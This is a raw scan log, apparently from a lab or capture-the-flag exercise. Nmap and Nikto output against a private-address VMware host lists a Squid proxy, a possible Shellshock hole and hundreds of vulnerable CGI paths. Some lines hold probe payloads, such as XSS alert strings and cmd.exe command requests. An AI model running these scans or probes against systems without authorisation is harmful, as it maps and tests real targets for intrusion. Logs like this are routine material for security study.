WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.47 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00017s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.1
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.38 seconds
() Status: Up

192.168.1.9:3128 set it as proxy

./http_scan_proxy.sh 192.168.1.9 80 3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.9
+ Target Hostname: 192.168.1.9
+ Target Port: 80
+ Proxy: 192.168.1.9:3128
+ Using Encoding: Random URI encoding (non-UTF8)
+ Start Time: 2017-01-11 21:06:01 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ lines
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec 5 02:35:02 2015
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ /webcgi/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-915/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-bin/cart32.exe: request cart32.exe/cart32clientlist
+ /htbin/cart32.exe: request cart32.exe/cart32clientlist
+ /cgibin/cart32.exe: request cart32.exe/cart32clientlist
+ /cgis/cart32.exe: request cart32.exe/cart32clientlist
+ /scripts/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-exe/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-perl/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-bin-sdb/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi/classified.cgi: Check Phrack 55 for info by RFP
+ /fcgi-bin/classified.cgi: Check Phrack 55 for info by RFP
+ /cgi-exe/classified.cgi: Check Phrack 55 for info by RFP
+ /cgi-bin-sdb/classified.cgi: Check Phrack 55 for info by RFP
+ /htbin/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-win/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-exe/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-perl/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /webcgi/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-bin/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgis/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-915/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-win/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /fcgi-bin/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /scripts/lwgate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-win/lwgate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /webcgi/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-915/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-bin/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-perl/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgibin/lwgate: Check Phrack 55 for info by RFP
+ /scripts/lwgate: Check Phrack 55 for info by RFP
+ /cgi-915/LWGate: Check Phrack 55 for info by RFP
+ /cgi/LWGate: Check Phrack 55 for info by RFP
+ /cgi-exe/LWGate: Check Phrack 55 for info by RFP
+ /webcgi/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-bin/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /htbin/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgis/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /scripts/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-exe/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-perl/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-bin-sdb/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-915/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /cgibin/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /fcgi-bin/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /cgi-exe/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /webcgi/finger: finger other users, may be other commands?
+ /cgi-bin/finger: finger other users, may be other commands?
+ /cgi-win/finger: finger other users, may be other commands?
+ /fcgi-bin/finger: finger other users, may be other commands?
+ /cgi-bin-sdb/finger: finger other users, may be other commands?
+ /htbin/finger.pl: finger other users, may be other commands?
+ /cgibin/finger.pl: finger other users, may be other commands?
+ /cgi-perl/finger.pl: finger other users, may be other commands?
+ /cgi-bin-sdb/finger.pl: finger other users, may be other commands?
+ /cgi-915/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgi-win/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /fcgi-bin/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgi-perl/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgibin/guestbook/passwd: GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.
+ /scripts/guestbook/passwd: GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.
+ /htbin/photo/protected/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.
+ /cgi-915/wrap.cgi: possible variation: comes with IRIX 6.2; allows to view directories
+ /fcgi-bin/wrap.cgi: possible variation: comes with IRIX 6.2; allows to view directories
+ /forums/config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-59620: /inc/common.load.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ /webcgi/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /htbin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgibin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi-win/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /fcgi-bin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi-perl/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /webcgi/html2chtml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-win/html2chtml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-perl/html2wml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-915/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /scripts/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /cgi-perl/guestbook.pl: May allow attackers to execute commands as the web daemon.
+ /cgi-bin-sdb/guestbook.pl: May allow attackers to execute commands as the web daemon.
+ /cgi/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /cgi-win/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /fcgi-bin/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /cgi-exe/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ OSVDB-8204: /gb/index.php?login=true: gBook may allow admin login by setting the value 'login' equal to 'true'.
+ /htbin/gH.cgi: Web backdoor by gH
+ /scripts/gH.cgi: Web backdoor by gH
+ /cgi-win/gH.cgi: Web backdoor by gH
+ /fcgi-bin/gH.cgi: Web backdoor by gH
+ /cgi-bin-sdb/gm-cplog.cgi: GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /getaccess: This may be an indication that the server is running getAccess for SSO
+ /cgi-bin/gm.cgi: GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /cgis/gm.cgi: GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /cgi-915/AT-admin.cgi: Admin interface...
+ /cgi-bin-sdb/AT-admin.cgi: Admin interface...
+ /cgi-bin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /htbin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgibin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi-915/mt/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi-bin-sdb/mt/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /fcgi-bin/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-perl/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /webcgi/bannereditor.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-bin/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgibin/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgis/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-win/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-exe/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-bin-sdb/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /webcgi/bizdb1-search.cgi: This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm
+ /cgi-bin/blog/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /vgn/vr/Editing: Vignette CMS admin/maintenance script available.
+ OSVDB-17652: /SiteServer/admin/findvserver.asp: Gives a list of installed Site Server components.
+ OSVDB-2878: /cgibin/moin.cgi?test: MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vulnerability
+ /clusterframe.jsp: Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.
+ /scripts/tools/dsnform: Allows creation of ODBC Data Source
+ /readme.eml: Remote server may be infected with the Nimda virus.
+ /ows/restricted%2eshow: OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.
+ /WEB-INF./web.xml: Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.l
+ OSVDB-42680: /vider.php3: MySimpleNews may allow deleting of news items without authentication.
+ OSVDB-6181: /officescan/cgi/cgiChkMasterPwd.exe: Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.
+ /webcgi/astrocam.cgi: Astrocam 1.4.1 contained buffer overflow http://www.securityfocus.com/bid/4684. Prior to 2.1.3 contained unspecified security bugs
+ /cgi-bin-sdb/astrocam.cgi: Astrocam 1.4.1 contained buffer overflow http://www.securityfocus.com/bid/4684. Prior to 2.1.3 contained unspecified security bugs
+ /webcgi/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /cgi-915/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /cgi-perl/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /webcgi/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /scripts/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-win/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-bin/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgibin/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-win/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-exe/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-bin/ezman.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /scripts/ezman.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ OSVDB-11741: /htbin/foxweb.exe: Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.
+ OSVDB-11741: /scripts/foxweb.exe: Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.
+ /cgi-915/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /fcgi-bin/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /cgi-exe/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /servlet/com.unify.servletexec.UploadServlet: This servlet allows attackers to upload files to the server.
+ /cgi-exe/uploader.exe: This CGI allows attackers to upload files to the server and then execute them.
+ /cgi-perl/uploader.exe: This CGI allows attackers to upload files to the server and then execute them.
+ /upload.asp: An ASP page that allows attackers to upload files to server
+ /uploadx.asp: An ASP page that allows attackers to upload files to server
+ /wa.exe: An ASP page that allows attackers to upload files to server
+ /webcgi/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /scripts/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /cgi-win/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /cgi-bin-sdb/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /vgn/ac/delete: Vignette CMS admin/maintenance script available.
+ /vgn/ac/edit: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/style: Vignette CMS admin/maintenance script available.
+ OSVDB-41850: /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb: MPCSoftWeb Guest Book passwords retrieved.
+ OSVDB-319: /scripts/mailit.pl: Sambar may allow anonymous email to be sent from any host via this CGI.
+ OSVDB-319: /cgi-bin-sdb/mailit.pl: Sambar may allow anonymous email to be sent from any host via this CGI.
+ OSVDB-11093: /cgi/%2e%2e/abyss.conf: The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/
+ OSVDB-11093: /cgis/%2e%2e/abyss.conf: The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/
+ OSVDB-6467: /pw/storemgr.pw: Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.
+ /shopa_sessionlist.asp: VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.
+ /typo3conf/localconf.php: TYPO3 config file found.
+ /typo/typo3conf/localconf.php: TYPO3 config file found.
+ OSVDB-4907: /vgn/license: Vignette server license file found.
+ /webcart/config/clients.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /ws_ftp.ini: Can contain saved passwords for FTP sites
+ /WS_FTP.ini: Can contain saved passwords for FTP sites
+ OSVDB-11871: /webcgi/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-exe/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-perl/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-bin-sdb/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ /cgibin/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /fcgi-bin/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-exe/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgi-bin/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgibin/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgis/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /htbin/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgi-win/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgi-exe/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgibin/architext_query.cgi: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-exe/architext_query.cgi: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-bin/cmd.exe?/c+dir: cmd.exe can execute arbitrary commands
+ /fcgi-bin/cmd.exe?/c+dir: cmd.exe can execute arbitrary commands
+ /fcgi-bin/cmd1.exe?/c+dir: cmd1.exe can execute arbitrary commands
+ /cgibin/archie: Gateway to the unix command, may be able to submit extra commands
+ /cgis/archie: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/archie: Gateway to the unix command, may be able to submit extra commands
+ /cgi-perl/archie: Gateway to the unix command, may be able to submit extra commands
+ /webcgi/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /cgi-bin/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /cgi-perl/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /webcgi/calendar: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/calendar: Gateway to the unix command, may be able to submit extra commands
+ /cgi-win/calendar: Gateway to the unix command, may be able to submit extra commands
+ /htbin/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgi-exe/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgi/redirect: Redirects via URL from form
+ /scripts/redirect: Redirects via URL from form
+ /cgi-win/redirect: Redirects via URL from form
+ /cgi-exe/redirect: Redirects via URL from form
+ /cgi-bin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgis/uptime: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgi-bin/wais.pl: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/wais.pl: Gateway to the unix command, may be able to submit extra commands
+ /names.nsf: User names and groups can be accessed remotely (possibly password hashes as well)
+ /webcgi/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /cgi-915/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /cgi/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /scripts/nph-error.pl: Gives more information in error messages
+ /cgi-perl/post-query: Echoes back result of your POST
+ /cgi-bin-sdb/post-query: Echoes back result of your POST
+ /cgi-915/query: Echoes back result of your GET
+ /htbin/query: Echoes back result of your GET
+ /scripts/query: Echoes back result of your GET
+ /fcgi-bin/query: Echoes back result of your GET
+ /cgibin/test-env: May echo environment variables or give directory listings
+ /cgis/test-env: May echo environment variables or give directory listings
+ /cgi-exe/test-env: May echo environment variables or give directory listings
+ /cgi-perl/test-env: May echo environment variables or give directory listings
+ /admin-serv/config/admpw: This file contains the encrypted Netscape admin password. It should not be accessible via the web.
+ /tree: WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /852566C90012664F: This database can be read using the replica ID without authentication.
+ /hidden.nsf: This database can be read without authentication. Common database name.
+ /cgi-915/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgis/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi-perl/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi-bin-sdb/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ OSVDB-6666: /webcgi/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /cgi/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /htbin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /scripts/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
+ OSVDB-55370: /cgibin/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /scripts/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /fcgi-bin/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /cgi-perl/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55369: /cgi-915/testcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55369: /cgi-bin-sdb/testcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.
+ /cgi-bin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /htbin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /fcgi-bin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /cgi-exe/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /cgi-915/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ /fcgi-bin/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ /cgi-perl/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ OSVDB-36894: /My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ /cgi-915/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ /cgi-bin/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ /scripts/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ OSVDB-10107: /author.asp: May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.
+ /webcgi/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/. http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi-915/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/. http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/. http://www.cert.org/advisories/CA-2000-02.html.
+ /cgis/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/. http://www.cert.org/advisories/CA-2000-02.html.
+ /scripts/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/. http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /cgi/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /htbin/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /cgi-bin-sdb/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-19772: /cgi-915/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-win/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /fcgi-bin/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-exe/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-perl/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
